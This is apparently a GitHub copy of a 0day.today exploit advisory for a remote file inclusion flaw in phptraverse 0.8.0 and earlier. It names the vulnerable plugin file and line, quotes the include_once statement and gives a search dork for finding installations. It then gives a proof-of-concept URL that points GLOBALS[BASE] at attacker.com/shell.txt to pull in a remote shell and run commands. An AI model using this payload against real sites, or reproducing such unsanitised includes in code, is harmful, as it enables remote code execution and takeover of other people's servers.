forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10014.txt
21 lines (17 loc) · 816 Bytes
/
10014.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
phptraverse <= 0.8.0 Remote File Inclusion Vulnerability
========================================================
########################################################################
#phptraverse <= 0.8.0 Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/phptraverse/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)
# <?php
# include_once $GLOBALS['BASE'].'/PEAR/PEAR.php';
# ?>
#PoC : http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################